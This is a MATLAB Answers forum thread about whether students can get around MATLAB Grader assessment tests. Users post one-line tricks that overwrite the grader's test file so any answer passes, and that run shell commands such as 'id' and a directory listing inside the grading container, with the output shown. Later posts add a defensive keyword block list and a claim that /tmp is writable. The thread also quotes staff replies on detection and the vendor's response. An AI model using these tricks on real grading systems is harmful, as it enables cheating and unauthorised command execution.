Can matlab grader questions be vulnerable by hackers through pretest?
Afficher commentaires plus anciens
for example:
Using ethical hacking it was obtained
then replaced in Learner template
Réponse acceptée
Cris LaPierre
le 30 Avr 2022
Modifié(e) : Cris LaPierre
le 30 Avr 2022
0 votes
If the pretest assessment is a MATLAB Code test type, then learners can expand the test to see the underlying assessment test code.
If that code gives away too much, then consider not making that assessment a pretest. If you are not limiting the number of submissions (default behavior in MATLAB Grader), then there is really no value to making any of the tests pretests anyway.
For an example of how to use pretests, consider looking at the "Calculating voltage using Kirchhoff loops" example problem in the Getting Started with MATLAB Grader problem collection.
I do have some concerns with the code you have shown. Perhaps if you can explain what you are trying to do with this code, perhaps there is an opportunity to modify the problem design.
1 commentaire
Hermes Pantoja
le 1 Mai 2022
Plus de réponses (2)
Jeff Alderson
le 30 Avr 2022
1 vote
Every time a learner solution is submitted, the solution is recorded and made available to the instructor. Solutions that use obvious attempts at circumventing assessment tests would be very transparent when compared to learner solutions that attempt to solve the problem in good faith. Additionally, the instructor can check for the presence of certain keywords and functions and fail the assessment if they are found. Similarly, the instructor could look for the presence of keywords necessary to solve the problem in the desired way, and fail the assessment if they are not found.
1 commentaire
Hermes Pantoja
le 1 Mai 2022
Nonsense
hack:
fprintf(fopen('./solutionTest.m', 'w'), '%s', '');
always works even if 'fopen' and 'fprintf' keywords are disabled
15 commentaires
Jeff Alderson
le 15 Déc 2024
Modifié(e) : Jeff Alderson
le 16 Déc 2024
It is irresponsible to encourage learners to circumvent assessment tests in the way you are proposing. Each and every submission attempt by a learner is recorded and made available to the instructor. Attempts to circumvent assessment tests in the manner you are proposing are highly visible to instructors and may be in violation with the academic integrity policies of the course/school where the product is being used.
Lastly, rest assured that the development team for MATLAB Grader is monitoring this article, and has already made note of this proposed attempt to circumvent assessment tests in the product. Even though the product may appear to accept such a circumvention submission by a learner, it would not be safe to assume that the learner’s attempt at circumvention is not known to MathWorks or the instructor for the course where the product is being used.
The attack consists of one line, so it is easy to miss it among many other commands The instructor who does not take this type of attack into account will have no choice but to accept the answer!!!It is crucial to protect the attacked file from modification!!!Protection against the attack with the save command has not been successful for two years, so it will be the same with my proposed attack!!!
Piotr Kot
le 16 Déc 2024
I've actually tried a few other attacks, the Matlab Grader team can find them in the logs of one of my courses. There's also a vaccine there. But I won't spoil the fun :)
Piotr Kot
le 16 Déc 2024
Déplacé(e) : John D'Errico
le 16 Déc 2024
I think the team should speed up their work.Things are starting to get really interesting....
fprintf(fopen('try1.m','w'),'%s',"system('id')")
try1
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
Matlab Teams doesn't take these types of reports seriously, which creates a unique opportunity to see how their operating system works:
fprintf(fopen('try1.m','w'),'%s',"system('cd /usr/bin; ls -la|head')")
try1
Output:
ans =
34
total 76736
drwxr-xr-x 1 root root 6144 Dec 17 16:22 .
drwxr-xr-x 1 root root 4096 Dec 18 05:35 ..
-rwxr-xr-x 1 root root 55744 Apr 5 2024 [
-rwxr-xr-x 1 root root 4486 Apr 12 2024 aa-easyprof
-rwxr-xr-x 1 root root 18744 Jul 18 18:28 aa-enabled
-rwxr-xr-x 1 root root 18744 Jul 18 18:28 aa-exec
-rwxr-xr-x 1 root root 18736 Jul 18 18:28 aa-features-abi
-rwxrwxrwx 1 root root 16422 Aug 15 08:26 add-apt-repository
-rwxr-xr-x 1 root root 14720 Aug 9 02:33 addpart
ans =
0
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
And all it would take would be to remove write permissions in the directory
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
In such a situation, I am posting my solution to the problems described above. You should prepare a solution.p from the solution.m file and add it to the task so that the student cannot do the things described in this thread
solution.m :
fileID = fopen("solution.p", 'r+');
fclose(fileID);
clear fileID;
kod=fileread("solution.m");
forbidden = ["java","pyrun","matlab","fileattrib", "save","load","matfile"];
pattern=strjoin(forbidden,'|');
if ~isempty(regexp(kod, pattern, 'once'))
error("Forbidden!!!");
end
copyfile('solution.m', 'solution1.m');
fileattrib '.' '-w' 'u'
fileattrib '*' '-w' 'u'
evalin('caller','solution1');
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
At the same time, I am announcing a competition to break through my security
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
Apparently my solution actually exploits another vulnerability
Piotr Kot
le 18 Déc 2024
Déplacé(e) : Cris LaPierre
le 18 Déc 2024
By the way, let's note that my solution gives a unique possibility of control over the student's solution.The solution.p file always starts, which allows copying the student's solution from the solution.m file to another and starting it. Of course, if the student had the possibility of overwriting the solution.p file, it would be a problem.
A heartfelt request to the Matlab Grader team to prepare a similar but already safe control option as part of their solution.
Cris LaPierre
le 18 Déc 2024
If you would like to provide feedback to MathWorks, you can do that here: https://www.mathworks.com/support/contact_us.html
Piotr Kot
le 18 Déc 2024
Modifié(e) : Walter Roberson
le 18 Déc 2024
Piotr Kot
le 20 Déc 2024
One more small note. My attempt to solve the problem can also be overcome. It turns out that the /tmp directory is available for writing to anyone who wants it. And then, of course, we run a script with any commands we want.
Piotr Kot
le 20 Déc 2024
And finally, to sum up the Matlab Grader team's response:
„The behavior explained through the reproduction steps is intended. The MATLAB session running within Grader operates within an isolated containerized instance. Logged-in users are permitted to run MATLAB functions, including commands that interact programmatically with the operating system and the MATLAB application. Therefore, executing the 'system' command does not introduce any additional risk to MATLAB Grader."
Communautés
Plus de réponses dans Distance Learning Community
Catégories
En savoir plus sur Startup and Shutdown dans Centre d'aide et File Exchange
le 30 Avr 2022
le 20 Déc 2024
Community Treasure Hunt
Find the treasures in MATLAB Central and discover how the community can help you!
Start Hunting!
Translated by 
